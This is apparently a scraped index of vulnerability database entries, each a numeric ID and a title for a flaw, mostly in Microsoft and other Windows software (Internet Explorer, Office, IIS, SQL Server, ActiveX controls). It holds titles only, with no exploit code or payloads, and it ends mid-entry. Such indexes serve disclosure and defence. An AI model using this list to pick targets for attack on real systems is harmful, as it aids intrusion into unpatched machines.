[47969] Microsoft Multiple Products GDI+ BMP Integer Calculation Overflow [47968] Microsoft Multiple Products GDI+ WMF Image Handling Overflow [47967] Microsoft Multiple Products GDI+ GIF Image Handling Arbitrary Code Execution [47966] Microsoft Multiple Products GDI+ EMF File Handling Memory Corruption [47965] Microsoft Multiple Products GDI+ VML Gradient Size Handling Overflow [47964] Microsoft Office OneNote Protocol Handler (onenote://) URI Handling Arbitrary Code Execution [47903] DiskCryptor on Windows BIOS Keyboard Buffer Local Password Disclosure [47856] Microsoft BitLocker BIOS Keyboard Buffer Local Password Disclosure [47475] Microsoft Visual Studio Masked Edit Control ActiveX (Msmask32.ocx) Mask Parameter Overflow [47447] RealVNC Windows Client vncviewer.exe Crafted Frame Buffer Update Packet Handling DoS [47419] Microsoft IE HTML Object Unspecified Memory Corruption [47418] Microsoft IE HTML Object Unspecified Memory Corruption [47417] Microsoft IE Object Handling Uninitialized Memory Corruption [47416] Microsoft IE HTML Document Objects Handling Memory Corruption [47415] Microsoft IE HTML Document Object Handling Memory Corruption [47414] Microsoft IE Print Preview HTML Component Handling Unspecified Arbitrary Code Execution [47413] Microsoft IE MHTML Protocol Handler Cross-Domain Information Disclosure [47410] Microsoft Office Excel connections.xml Password String Persistence [47409] Microsoft Office Excel Spreadsheet AxesSet Record Memory Corruption [47408] Microsoft Office Excel File FORMAT Record Array Index Handling Arbitrary Code Execution [47407] Microsoft Office Excel File COUNTRY Record Value Parsing Arbitrary Code Execution [47406] Microsoft PowerPoint Viewer Cstring Object Handling Memory Corruption [47405] Microsoft PowerPoint Viewer Picture Index Handling Memory Corruption [47404] Microsoft PowerPoint File List Value Handling Memory Corruption [47402] Microsoft Office Filters PICT File Handling Arbitrary Code Execution [47401] Microsoft Office Filters Encapsulated PostScript (EPS) File Handling Arbitrary Code Execution [47400] Microsoft Office BMPIMP32.FLT Filter BMP File Header Handling Arbitrary Code Execution [47398] Microsoft Office Filters PICT File bits_per_pixel Field Heap Corruption [47397] Microsoft Office WPGIMP32.FLT Filter WordPerfect Graphics (WPG) File Handling Arbitrary Code Execution [47299] Frisk F-PROT Antivirus Microsoft Office File Handling DoS [47004] Microsoft Crypto API S/MIME X.509 Certificate CRL Check Remote Information Disclosure [46935] Microsoft IE Pop Up Blocker Multiple Issues [46931] Microsoft Outlook/Express Unspecified URI Handling Arbitrary Command Injection [46914] Microsoft Word DOC File Handling Unspecified Arbitrary Code Execution [46827] Microsoft Visual Basic ActiveX (vb6skit.dll) fCreateShellLink Function Crafted lpstrLinkPath Argument Overflow [46780] Microsoft Outlook Web Access (OWA) HTML Parsing Unspecified XSS [46779] Microsoft Outlook Web Access (OWA) Data Validation Unspecified XSS [46773] Microsoft SQL Server Memory Page Reuse Information Disclosure [46772] Microsoft SQL Server Convert Function Overflow [46771] Microsoft SQL Server Stored Backup File Processing Memory Corruption Arbitrary Code Execution [46770] Microsoft SQL Server Crafted Insert Statement Overflow [46749] Microsoft Access Snapshot Viewer ActiveX (snapview.ocx) PrintSnapshot Method Arbitrary Code Execution [46723] Cisco VPN Client on Windows Dial-up Networking Dialog Local Privilege Escalation [46722] Apple Safari for Windows Crafted HTML Arbitrary File Download [46696] Opera for Windows Unspecified Arbitrary Code Execution [46676] Mozilla Multiple Browser Windows URL Shortcut Handling Cross-context Execution [46645] Microsoft Word DOC File Unordered List Handling Memory Corruption [46631] Microsoft IE Frame Location Handling Cross-frame Content Manipulation [46630] Microsoft IE location Window Object Handling XSS [46590] Avaya Message Storage Server (MSS) Admin Interface Windows Domain Parameter Arbitrary Command Execution [46501] Apple Safari for Windows URLACTION_SHELL_EXECUTE_HIGHRISK IE Zone Setting Restriction Bypass [46400] SurgeMail on Windows Unspecified Remote Issue (ZD-00000078) [46275] Sun Java on Windows jusched.exe Unspecified Overflow [46240] No-IP Windows Dynamic Update Client Registry Local Credentials Disclosure [46194] Novell iPrint Client for Windows ienipp.ocx ActiveX Multiple Variable Overflow [46084] Microsoft IE Request Header Handling Cross-domain Information Disclosure [46083] Microsoft IE HTML Object Handling Memory Corruption Arbitrary Code Execution [46065] Microsoft DirectX SAMI File Format Processing Arbitrary Code Execution [46064] Microsoft DirectX MJPEG Codec AVI/ASF File Processing Arbitrary Code Execution [45941] HP System Management Homepage (SMH) for Windows OpenSSL Version Regression [45906] Microsoft ISA Server SOCKS4 Proxy Empty Packet Cross Session Destination IP Disclosure [45826] Microsoft IE Local Zone Saved File URI XSS [45814] Microsoft IE Arbitrary Website Zone Addition Domain Supression DoS [45813] Microsoft IE URI Arbitrary Scheme Name XSS Filter Bypass [45806] Microsoft Register Server (REGSVR) Crafted DLL Handling Unspecified Issue [45583] Microsoft IIS w/ Visual Interdev Unspecified Authentication Bypass [45525] Microsoft IE Failed Connection DNS Pin Dropping Rebinding Weakness [45522] Symantec Veritas Backup Exec for Windows Unspecified Remote Issue [45517] Windows Mobile PC SMS Handler SMS Message Sender Field Spoofing [45442] Microsoft IE IObjectSafety Java Plug-in ActiveX COM Object Creation DoS [45441] Microsoft IE IObjectSafety CLSID_ApprenticeICW ActiveX Control COM Object Creation DoS [45440] Microsoft IE IObjectSafety SmartConnect Class ActiveX Control COM Object Creation DoS [45439] Microsoft IE IObjectSafety System Monitor Source Properties ActiveX Control COM Object Creation DoS [45438] Microsoft IE IObjectSafety Outlook Progress Ctl ActiveX Control COM Object Creation DoS [45437] Microsoft IE Location DOM Object Page Load Interruption Site/Certificate Spoofing [45436] Microsoft IE URI Unspecified Scheme Traversal Arbitrary File Access [45435] Microsoft IE file: URI Absolute Traversal Arbitrary File Access [45354] Stunnel on Windows Unspecified Local Privilege Escalation [45264] Microsoft Office Publisher File Format Unspecified Remote Code Execution [45262] Microsoft ISA Server Host Header Log File Content Injection [45260] Microsoft IE Malformed Table Element CSS Attribute Handling DoS [45259] Microsoft IE mshtml.dll Malformed IFRAME XML File / XSL Stylesheet Handling DoS [45248] Microsoft IE JavaScript onUnload Document Structure Modification DoS [45218] Microsoft Outlook Web Access Cache-Control Directive Information Caching Persistence [45185] Microsoft Baseline Security Analyzer (MBSA) Reboot Race Condition Weakness [45074] Microsoft IE Print Table of Links Cross-Zone Scripting [45033] Microsoft Publisher Object Handler Header Data Validation Arbitrary Code Execution [45032] Microsoft Word Document Malformed CSS Handling Memory Corruption Arbitrary Code Execution [45031] Microsoft Office RTF File Handling Object Parsing Arbitrary Code Execution [45028] Microsoft Malware Protection Engine File Parsing Disk-space Exhaustion DoS [45027] Microsoft Malware Protection Engine File Parsing Service DoS [45008] Microsoft Outlook E-mail Message Malformed Header / Body Separation Remote DoS [44979] Microsoft SQL Server Blank sa Password Set Weakness [44973] Microsoft IE DisableCachingOfSSLPages SSL Page Caching Persistence [44964] Apple QuickTime Player on Windows Crafted Media File Arbitrary Code Execution [44963] IBM DB2 Universal Database on Windows Multiple Function JAR File Handling Remote DoS [44959] Microsoft Office on Mac OS X Installation Permission Bypass [44938] Microsoft Office Open XML (OOXML) Document Metadata Field Modification Signature Weakness [44721] IBM DB2 Universal Database Windows Change Password Policy Bypass [44652] Microsoft HeartbeatCtl HRTBEAT.OCX ActiveX Unspecified Method Host Argument Overflow [44597] Oracle Application Server on Windows Crafted URI Remote DoS [44527] Oracle Application Server on Windows Installation Default Permission Weakness [44459] Microsoft Sharepoint Rich Text Editor Picture Source XSS [44458] Microsoft Works WkImgSrv.dll WksPictureInterface Property Remote DoS [44319] Microsoft Office Publisher Crafted PUB File Handling DoS [44318] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Arbitrary Remote Code Execution [44303] Microsoft IE body Tag Infinite Loop DoS [44212] Microsoft Project File Handling Unspecified Arbitrary Code Execution [44211] Microsoft Vbscript.dll VBScript Decoding Code Execution [44210] Microsoft Jscript.dll JScript Arbitrary Code Execution [44205] Microsoft IE Data Stream Handling Memory Corruption [44170] Microsoft Visio DXF File Handling Memory Validation Arbitrary Code Execution [44169] Microsoft Visio Object Header Data Handling Arbitrary Code Execution [44150] Microsoft Access Crafted MDB File Handling Overflow [44004] Apple QuickTime on Windows Movie Animation Codec Handling Overflow [44002] Apple QuickTime on Windows PICT Handling Clip opcode Parsing Overflow [43606] Microsoft IE XMLHttpRequest() Multiple Header Overwrite HTTP Response Splitting [43605] Microsoft IE Chunked Transfer-Encoding Request Smuggling [43602] FutureSoft TFTP Server 2000 for Windows UDP Request Handling Remote Overflow [43521] Microsoft IE CSS :visited Pseudo-class Browser History Disclosure [43471] Microsoft IE Digest Authentication username Attribute CRLF Injection [43464] Microsoft Jet Database Engine Word File Handling Unspecified Code Execution [43451] Microsoft IIS HTTP Request Smuggling [43325] Microsoft Atlas Framework JavaScript Object Notation (JSON) Crafted HTML Remote Data Disclosure [43314] Microsoft IE JavaScript Long String Regex Match Remote DoS [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption [43242] Novell GroupWise Windows Client API Shared Folder Security Bypass [43076] Acronis True Image Windows Agent Malformed Packet Remote DoS [43068] Microsoft Access MDB File Handling Unspecified Arbitrary Code Execution [42978] Double-Take for Windows username Field Remote Overflow [42977] Double-Take for Windows ospace/time/src\date.cpp Exception Remote DoS [42976] Double-Take for Windows Crafted Request CPU Consumption Remote DoS [42975] Double-Take for Windows Malformed Packet NULL Dereference Remote DoS [42974] Double-Take for Windows Crafted Packet Memory Allocation Error Remote DoS [42973] Double-Take for Windows Crafted Packet Remote Information Disclosure [42972] Double-Take for Windows Crafted Packet Function Recursion Remote DoS [42799] Microsoft IE URI Handling Arbitrary FTP Command Injection [42732] Microsoft Excel Macro Validation Unspecified Code Execution [42731] Microsoft Excel Conditional Formatting Value Unspecified Code Execution [42730] Microsoft Excel BIFF File Format Rich Text Tag Malformed Tag Memory Corruption [42725] Microsoft Excel XLS Malformed Formula Memory Corruption [42724] Microsoft Excel Style Record Handling Memory Corruption [42723] Microsoft Excel SLK File Import Unspecified Arbitrary Code Execution [42722] Microsoft Excel BIFF8 Spreadsheet DVAL Record Handling Arbitrary Code Execution [42712] Microsoft Office Web Components DataSource Page Handling Arbitrary Code Execution [42711] Microsoft Office Web Components URL Parsing Arbitrary Code Execution [42710] Microsoft Outlook mailto: URI Handling Arbitrary Command Execution [42709] Microsoft Office Unspecified Malformed Document Handling Memory Corruption [42708] Microsoft Office Excel Document (XLS) Cell Record Rebuilding Memory Corruption [42360] Symantec Backup Exec for Windows Servers (BEWS) PVATLCalendar.PVCalendar.1 ActiveX (pvcalendar.ocx) Save() Method Arbitrary File Manipulation [42358] Symantec Backup Exec for Windows Servers (BEWS) PVATLCalendar.PVCalendar.1 ActiveX (pvcalendar.ocx) Multiple Overflows [42329] Symantec Backup Exec for Windows Servers (BEWS) Unspecified Remote Issue [42193] VLC Media Player on Windows RTSP Data Handling Unspecified Remote Overflow [42152] Microsoft Silverlight ActiveX Unspecified Overflow [42058] Microsoft FrontPage CERN Image Map Dispatcher (htimage.exe) Arbitrary File Information Disclosure [41871] Mono on Windows System.Web StaticFileHandler.cs Crafted Request Source Code Disclosure [41775] PHP Component Object Model (COM) on Windows Multiple Restriction Bypass [41727] Windows Privacy Tray (WinPT) Crafted Key Installation Visual Truncation Weakness [41628] IBM Informix Storage Manager (ISM) Windows RPC Components XDR Library Multiple Unspecified Remote Overflows [41621] IBM Informix Dynamic Server (IDS) on Windows Unspecified SQ_ONASSIST Request Remote DoS [41468] Microsoft FoxPro ActiveX Web Page Parsing Unspecified Memory Corruption [41467] Microsoft IE Image Processing Argument Validation Unspecified Memory Corruption [41466] Microsoft IE animateMotion.by SVG Element by Property Memory Corruption [41465] Microsoft IE HTML Layout Rendering Unspecified Memory Corruption [41464] Microsoft Word Document Handling Unspecified Memory Corruption [41462] Microsoft Office Malformed Object Parsing Memory Corruption [41461] Microsoft Active Directory / ADAM Malformed LDAP Request Remote DoS [41460] Microsoft WebDAV Mini-Redirector Response Handling Arbitrary Code Execution [41459] Microsoft Works File Converter .wps File Multiple Field Handling Arbitrary Code Execution [41458] Microsoft Works File Converter .wps File Header Index Table Handling Arbitrary Code Execution [41457] Microsoft Works File Converter .wps Format Header Handling Arbitrary Code Execution [41456] Microsoft IIS File Change Handling Local Privilege Escalation [41447] Microsoft Office Publisher Memory Index Validation .pub File Handling Arbitrary Code Execution [41446] Microsoft Office Publisher .pub File Handling Arbitrary Code Execution [41445] Microsoft IIS ASP Web Page Input Unspecified Arbitrary Code Execution [41382] Microsoft IE OnKeyDown JavaScript htmlFor Attribute Keystroke Disclosure [41377] F-Secure Anti-Virus for Windows system32 Directory Crafted File Detection Bypass [41091] Microsoft IIS webhits.dll Hit-Highlighting Authentication Bypass [41080] Microsoft Visual Database Tools MSVDTDatabaseDesigner7 ActiveX (VDT70.DLL) NotSafe Function Arbitrary Code Execution [41063] Microsoft IIS ODBC Tool newdsn.exe Remote DSN Creation [41060] Microsoft .NET Unspecified XSS Filter Bypass [41057] Microsoft IIS w/ .NET MS-DOS Device Request Blacklist Bypass [41053] Microsoft Visual Basic vbp File Company Name Field Processing Overflow [41052] Microsoft Visual Basic vbp File Description Field Processing Overflow [41048] Microsoft IE Content-Disposition HTML File Handling XSS [41047] Microsoft IE mshtml Malformed HTML Tag DoS [41041] Microsoft IE Mouse Click self.resizeTo DoS [41040] Microsoft IE onclick Self Referencing Button Infinite Loop DoS [41036] Microsoft IE DLL Search Path Subversion Local Privilege Escalation [41035] Microsoft IE onload Localhost DoS [41026] Microsoft IE GET Request Overflow [41025] Microsoft IE Drag and Drop Arbitrary Program Execution [41024] Microsoft IE Cross Zone Domain Resolution Weakness [40882] Apple Safari on Windows Bookmark Title Overflow [40872] Cisco VPN Client on Windows Dial-up Networking cvpnd.exe Permission Weakness Local Privilege Escalation [40865] Symantec Backup Exec for Windows Servers (BEWS) Job Engine (bengine.exe) Crafted Packet Remote DoS [40735] Apple Mac OS X Microsoft Office Spotlight Importer XLS Handling Memory Corruption [40531] Microsoft Visual Basic DSR File Handling Remote Code Execution [40434] Apple Quicktime for Windows Crafted QTL File qtnext Field Remote Command Execution [40381] Microsoft Visual FoxPro VFP_OLE_Server ActiveX foxcommand Method Arbitrary Code Execution [40380] Microsoft Visual FoxPro ActiveX (vfp6r.dll) DoCmd Method Arbitrary Command Execution [40352] Microsoft Visual InterDev SLN File Long Project Line Arbitrary Code Execution [40344] Microsoft Excel Malformed Header File Handling Remote Code Execution [40271] phPay on Windows main.php config Parameter Traversal Local File Inclusion [40256] Windows NT FTP Server (WFTP) Explorer LIST Command Long Reply Arbitrary Remote Code Execution [40234] Microsoft Rich Textbox Control (RICHTX32.OCX) SaveFile Method Arbitrary File Overwrite [40125] Motorola Timbuktu Pro for Windows Scanner Function HELLO Response Packet Remote Overflow [40124] Motorola Timbuktu Pro for Windows Authentication Username Remote Overflow [40123] Motorola Timbuktu Pro for Windows Application Protocol Request Unspecified Remote Overflow [40121] Motorola Timbuktu Pro for Windows Send Request Traversal Arbitrary File Manipulation [40119] Subversion on Windows Filename Repository Filename Traversal Arbitrary File Overwrite [40118] TortoiseSVN on Windows Filename Traversal Arbitrary File Overwrite [40091] VMware Multiple Products Windows Search Path Subversion Local Privilege Escalation [39900] Microsoft Web Proxy Auto-Discovery (WPAD) Crafted DNS MitM Weakness [39754] Trend Micro ServerProtect for Windows (SpntSvc.exe) Notification.dll NTF_SetPagerNotifyConfig Function Remote Overflow [39753] Trend Micro ServerProtect for Windows (SpntSvc.exe) Eng50.dll Multiple Function Remote Overflow [39752] Trend Micro ServerProtect for Windows (SpntSvc.exe) Stcommon.dll Multiple Function Remote Overflow [39751] Trend Micro ServerProtect for Windows (SpntSvc.exe) StRpcSrv.dll Multiple Function Remote Overflow [39750] Trend Micro ServerProtect for Windows Agent Service RPCFN_CopyAUSrc Function Remote Overflow [39707] Toribash Server on Windows Malformed Command Remote DoS [39562] AMD ATI atidsmxx.sys on Windows Vista Local Privilege Escalation [39358] Ingres on Windows Persistent User Privilege Remote Privilege Escalation [39255] Windows Vista UACE Local Privilege Escalation [39250] X Windows (X11) Unspecified HTML Processing DoS [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure [39121] Microsoft IE DHTML Object Memory Corruption [39120] Microsoft IE Element Tag Uninitialized Memory Corruption [39119] Microsoft IE Object cloneNode / nodeValue Function Uninitialized Memory Corruption [39118] Microsoft IE Object setExpression Function Memory Corruption [38955] Microsoft IE history.length Variable History Disclosure [38954] Microsoft Excel Sheet Name Unspecified Code Execution [38953] Microsoft IE Document Variable Overwrite Same Origin Policy Bypass [38869] Apple Safari for Windows corefoundation.dll History Error Remote DoS [38866] Apple Safari for Windows Unspecified Memory Corruption DoS (crash #2) [38864] Apple Safari for Windows feed:// URL DoS [38572] Windows RSH daemon (rshd) Packet Processing Remote Overflow [38542] Apple Safari for Windows IFRAME SRC Arbitrary Command Execution [38541] Apple Safari for Windows Unspecified DHTML Manipulation Remote DoS [38497] Microsoft IE Page Transaction Race Condition Arbitrary Code Execution [38496] Microsoft Sysinternals DebugView Dbgv.sys Local Privilege Escalation [38495] Microsoft IE Outlook Express Address Book Activex DoS [38493] Microsoft IE HTML Popup Window (mshtml.dll) DoS [38488] Microsoft ISA Server File Extension Filter Bypass [38487] Microsoft Visual FoxPro ActiveX (FPOLE.OCX) FoxDoCmd Function Arbitrary Command Execution [38486] Microsoft Expression Media IVC File Cleartext Catalog Password Disclosure [38471] Microsoft Office MSODataSourceControl ActiveX DeleteRecordSourceIfUnused Method Overflow [38399] Microsoft SQL Server Enterprise Manager Distributed Management Objects OLE DLL ActiveX (sqldmo.dll) Start Method Arbitrary Code Execution [38212] Microsoft IE document.open() Function Address Bar Spoofing [38211] Microsoft IE with Netscape navigatorurl URI Cross-browser Command Execution [38018] Microsoft IE with Mozilla SeaMonkey Cross-browser Command Execution [38017] Microsoft IE with Mozilla Firefox Cross-browser Command Execution [37992] Atheros 802.11 Wireless Driver on Windows Management Frame Handling DoS [37817] Windows NT Message Compiler MC-filename Local Overflow [37764] Sun Java JDK / JRE on Windows Untrusted Application Arbitrary File Access [37638] Microsoft IE res:// URI Image Object Local File Enumeration [37636] Microsoft IE Crafted JavaScript for Loop Null Pointer DoS [37634] Microsoft Word Crafted Document Unspecified Resource Consumption DoS [37633] Microsoft Word wwlib.dll Crafted Document Overflow DoS [37632] Microsoft Word Unspecified Memory Corruption [37630] Microsoft SharePoint PATH_INFO (query string) XSS [37626] Microsoft IE Unspecified Address Bar Spoofing [37625] Microsoft IE File Download Queue Handling Use-After-Free Arbitrary Code Execution [37590] WIDCOMM Bluetooth for Windows (BTW) Traversal Arbitrary File Manipulation [37589] WIDCOMM Bluetooth for Windows (BTW) Remote Communication Interception (CarWhisperer) [37383] ZoneAlarm Pro Windows API Function Identifier Manipulation Local Policy Bypass [37375] Comodo Firewall Pro Windows API Function Identifier Manipulation Local Policy Bypass [37250] Sun Java System (SJS) Application Server on Windows Unspecified JSP Source Disclosure [37148] Microsoft TSAC ActiveX connect.asp Unknown XSS [37107] Microsoft Visual Studio VB To VSI Support Library ActiveX (VBTOVSI.DLL) SaveAs Method Arbitrary File Manipulation [37106] Microsoft Visual Studio ActiveX (PDWizard.ocx) Multiple Method Arbitrary Program Execution [37011] Nessus Windows GUI Unspecified XSS [36936] Microsoft Visual Basic VBP File Handling Overflow [36934] Microsoft Agent URL Handling Remote Code Execution [36605] Apple Safari windows.setTimeout Function XSS [36524] Credant Mobile Guardian Shield for Windows Cleartext Credential Disclosure [36400] Microsoft IE HTML FTP Credential Disclosure [36399] Microsoft DirectX Media SDK DXSurface.LivePicture.FlashPix.1 (DirectTransform FlashPix) ActiveX SourceUrl Property Overflow [36398] Microsoft IE FTP Unspecified Remote Memory Address Disclosure [36397] Microsoft IE Crafted CSS Unspecified Memory Corruption [36396] Microsoft IE ActiveX tblinf32.dll Unspecified Arbitrary Code Execution [36395] Microsoft IE ActiveX (pdwizard.ocx) Unspecified Memory Corruption [36394] Microsoft XML Core Services (MSXML) Multiple Object Handling Overflow [36389] Microsoft Virtual PC Guest Administrator Unspecified Local Privilege Escalation [36383] Microsoft Excel Workspace rtWnDesk Record Memory Corruption [36151] Microsoft DirectX RLE Compressed Targa Image Processing Overflow [36147] Microsoft IE Zone Domain Specification DoS [36142] Microsoft IE IDN Site Basic Authentication Status Bar Truncation Spoofing [36111] Symantec Backup Exec for Windows RPC Crafted ncacn_ip_tcp Request Remote Overflow [36105] Symantec LiveState for Windows shstart.exe Local Privilege Escalation [36089] PHP COM Extensions on Windows WScript.Shell COM Object safe_mode Bypass [36062] Mozilla Firefox on Windows Encoded IP Phishing Protection Bypass [36059] Caucho Resin on Windows Crafted MS-DOS Request DoS [36058] Caucho Resin on Windows \web-inf Traversal Arbitrary File Access [36057] Caucho Resin on Windows Encoded Space (%20) Request Path Disclosure [36041] Fullaspsite Asp Hosting Sitesi windows.asp kategori_id Variable [36034] Microsoft Office 2000 Controllo ActiveX (OUACTRL.OCX) HelpPopup Method Overflow [35959] Microsoft Excel Viewer WorkBook Workspace Designation Memory Corruption [35958] Microsoft Excel Multiple Worksheet Unspecified Memory Corruption [35957] Microsoft Excel Version Information Validation Crafted File Arbitrary Code Execution [35956] Microsoft .NET Framework Just In Time (JIT) Compiler Service Unspecified Arbitrary Code Execution [35955] Microsoft .NET Framework NULL Byte URL Arbitrary File Access [35954] Microsoft .NET Framework PE Loader Service Unspecified Arbitrary Code Execution [35953] Microsoft Office Publisher .pub Page Data Handling Arbitrary Code Execution [35950] Microsoft IIS IUSR_Machine Account Arbitrary Non-EXE Command Execution [35922] Mozilla Firefox on Windows resource:// %5C Encoded Traversal Arbitrary File Access [35763] Microsoft PowerPoint Unspecified Arbitrary Code Execution [35568] Microsoft IE Script Variable Length DoS [35517] Mbedthis AppWeb on Windows Mixed Case URL Unspecified Bypass [35353] Microsoft IE Speech API 4 Xlisten.dll / Xvoice.dll Memory Corruption [35352] Microsoft IE navcancl.htm res: URI Phishing [35351] Microsoft IE Unspecified Memory Corruption Arbitrary Code Execution [35350] Microsoft IE Multiple Language Pack Installation Race Condition Code Execution [35349] Microsoft IE Crafted CSS Tag Handling Memory Corruption [35348] Microsoft IE Urlmon.dll COM Object Instantiation Memory Corruption [35343] Microsoft Visio Document Handling Crafted Packed Object Arbitrary Code Execution [35342] Microsoft Visio Document Handling Crafted Version Number Arbitrary Code Execution [35269] Microsoft ASP .NET Framework Comment Enclosure Handling Request Weakness [34963] Microsoft IE CCRP BrowseDialog Server (ccrpbds6.dll) ActiveX Multiple Property DoS [34959] Microsoft Xbox 360 Hypervisor Syscall Bypass Arbitrary Code Access [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure [34830] Microsoft Outlook Recipient ActiveX (ole32.dll) Crafted HTML DoS [34489] Microsoft Office 2003 Malformed WMF File Handling DoS [34488] Microsoft Excel 2003 XLS Handling Corrupt Format DoS [34407] Adobe Acrobat Reader Plugin for Microsoft IE Microsoft.XMLHTTP ActiveX CLRF Injection [34404] Microsoft IE Media Service Component Arbitrary File Rewrite [34403] Microsoft IE HTML CMarkup Objects Unspecified Memory Corruption [34402] Microsoft IE HTML Objects Unspecified Memory Corruption [34401] Microsoft IE Property Method Handling Memory Corruption [34400] Microsoft IE Uninitialized Object Memory Corruption [34399] Microsoft IE COM Object Instantiation Memory Corruption (931768) [34397] Microsoft CAPICOM CAPICOM.Certificates ActiveX (CAPICOM.dll) Remote Code Execution [34396] Microsoft Office Crafted Drawing Object Arbitrary Code Execution [34395] Microsoft Excel Filter Record Handling Remote Code Execution [34394] Microsoft Office Excel Set Font Handling Remote Code Execution [34393] Microsoft Excel BIFF Record Named Graph Record Parsing Overflow [34392] Microsoft Exchange Server IMAP Literal Processing DoS [34391] Microsoft Exchange Server MIME Decoding Remote Code Execution [34390] Microsoft Exchange Server MODPROPS Malformed iCal DoS [34389] Microsoft Exchange Outlook Web Access (OWA) Attachment Script Injection [34388] Microsoft Word RTF Rich Text Properties Parsing Remote Code Execution [34387] Microsoft Word Data Array Handling Remote Code Execution [34386] Microsoft Word Malformed Drawing Object Arbitrary Code Execution [34385] Microsoft Word Macro Content Arbitrary Code Execution [34082] Plesk for Windows login_up.php3 locale_id Parameter Traversal Arbitrary File Access [34081] Plesk for Windows login.php3 locale_id Parameter Traversal Arbitrary File Access [34077] Microsoft IE navcancl.htm res: URI XSS [34007] Microsoft Content Management Server (CMS) Unspecified XSS [34006] Microsoft Content Management Server (CMS) Crafted HTTP Request Memory Corruption [33639] Microsoft Class Package Export Tool (clspack.exe) Long String Overflow [33638] Microsoft ISA Server IPv6 Filter Rule Bypass [33629] Microsoft IE Animated Cursor (.ani) Handling Arbitrary Command Execution [33627] Microsoft Vista Speech Recognition Web Page Arbitrary Command Execution [33626] Microsoft Visual C++ MSVCR80.DLL Time Functions Assertion Error [33457] Microsoft IIS Crafted TCP Connection Range Header DoS [33398] Windows XP msgina.dll Local Overflow [33271] Microsoft Word Crafted Frame CSRF [33270] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution [33196] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution (934232) [32697] Flip4Mac Windows Media Components WMV Parsing Memory Corruption [32630] Microsoft IE Key Press Event Focus Redirection [32627] Microsoft IE msxml3 Module Nested Tag Race Condition DoS [32626] Microsoft IE Crafted res:// Forced 404 Page Reporting [32625] Microsoft IE res://ieframe.dll/invalidcert.htm Site Security Certificate Discrediting [32624] Microsoft IE mhtml Overflow DoS [32119] Microsoft IE Cross Domain Charset Inheritance Weakness [32087] Microsoft IE onunload Event Address Bar Spoofing [31901] Microsoft Office Unspecified String Handling Arbitrary Code Execution [31900] Microsoft Word Unspecified Memory Corruption Arbitrary Code Execution (929434) [31899] Microsoft Help Workshop HPJ File OPTIONS Section Overflow [31898] Microsoft Help Workshop Crafted .cnt File Handling Overflow [31896] Microsoft Project Server pdsrequest.asp GetInitializationData Request SQL Database Password Disclosure [31895] Microsoft IE Blnmgrps.dll COM Object Instantiation Memory Corruption [31894] Microsoft IE Htmlmm.ocx COM Object Instantiation Memory Corruption [31893] Microsoft IE Msb1fren.dll COM Object Instantiation Memory Corruption [31892] Microsoft IE FTP Server Response Parsing Memory Corruption [31891] Microsoft IE Imjpcksid.dll COM Object Instantiation Memory Corruption [31888] Microsoft Malware Protection Engine PDF File Parsing Remote Code Execution [31887] Microsoft MFC Component RTF OLE Object Memory Corruption Remote Code Execution [31886] Microsoft RichEdit OLE Dialog RTF Memory Corruption Remote Code Execution [31883] Microsoft Step-by-Step Interactive Training Bookmark Handling Remote Code Execution [31882] Microsoft MDAC ADODB.Connection ActiveX Control Execute Method Remote Code Execution [31805] XEROX WorkCentre Products Web User Interface Microsoft Networking Configuration Command Injection [31799] Windows Firewall ADS Application Alert Failure [31779] Windows Firewall .exe Incorrect Application Block Alerts [31647] Microsoft IE Javascript IsComponentInstalled Overflow [31607] Microsoft Visual Studio 1 TYPELIB MOVEABLE PURE .rc File Name Overflow [31345] Mozilla Multiple Products on Windows CSS Cursor Image Overflow [31333] Microsoft IE Image File Embedded Content XSS [31332] Microsoft IE Scrollbar CSS Property DoS [31331] Microsoft IE mailto: Handler Arbitrary Command-Line Argument Modification [31330] Microsoft IE File:// URI src Tag IFrame DoS [31329] Microsoft IE DNS Pinning Intranet Server Arbitrary Javascript Execution [31328] Microsoft IE UTF-7 Encoded HTTP 404 Error Message XSS [31326] Microsoft IE HTML Table Tag style Attribute DoS [31325] Microsoft IE HTML Frame Tag Invalid src Attribute DoS [31324] Microsoft IE DirectAnimation ActiveX Multiple Unspecified [31323] Microsoft IE DIV Tag and HTML CSS Float Properties Arbitrary Code Execution [31322] Microsoft IE SSL Certificate Chain Validation MiTM Weakness [31321] Microsoft IE Javascript self.location Refresh DoS [31258] Microsoft Excel Palette Record Handling Overflow [31257] Microsoft Excel Column Record Heap Corruption Remote Code Execution [31256] Microsoft Excel Malformed String Handling Remote Code Execution [31255] Microsoft Excel IMDATA Record Handling Remote Code Execution [31254] Microsoft Outlook Advanced Find .oss File Handling Remote Code Execution [31253] Microsoft Outlook E-mail Header Processing Unspecified DoS [31252] Microsoft Outlook VEVENT Record Handling Remote Code Execution [31251] Microsoft Office 2003 Brazilian Portuguese Grammar Checker Arbitrary Code Execution [31250] Microsoft IE Vector Markup Language (VML) Remote Overflow [31249] Microsoft Excel Malformed Record Memory Access Code Execution [31243] Windows NT FTP Server (WFTP) Pro Server APPE Command Overflow [30834] Microsoft IE URLMON.DLL Long URL HTTP Redirect Overflow [30826] Microsoft Visual Basic Click Event Procedure Overflow [30825] Microsoft Word Malformed Data Structure Handling Memory Corruption [30824] Microsoft Word Malformed String Memory Corruption [30822] Microsoft IE A Tag Long Title Attribute DoS [30820] Microsoft Word mso.dll / mso9.dll LsCreateLine Function DoS [30816] Microsoft IE TIF Folder Cached Content Information Disclosure [30815] Microsoft IE TIF Folder Drag and Drop Operation Information Disclosure [30814] Microsoft IE DHTML Script Function Memory Corruption [30813] Microsoft IE Script Error Handling Memory Corruption [30402] Microsoft w3wp Crafted COM Component Request DoS [30208] Microsoft XMLHTTP ActiveX Control setRequestHeader Method Arbitrary Code Execution [30155] Microsoft Visual Studio WMI Object Broker ActiveX (WmiScriptUtils.dll) Unspecified Code Execution [30087] Microsoft IE Empty APPLET Tag DoS [30022] Microsoft IE Non-breaking Spaces Popup Address Bar Spoofing [29724] Microsoft Hyperlink Object Library (hlink.dll) Crafted Hyperlink Arbitrary Code Execution [29720] Microsoft PowerPoint Unspecified Code Execution [29525] Microsoft IE dxtmsft3.dll Multiple ActiveX COM Object DoS [29524] Microsoft IE dxtmsft.dll Multiple ActiveX COM Object DoS [29514] AK-Systems Windows Terminal VNC Server Default Null Password [29512] Windows NT FTP Server (WFTP) 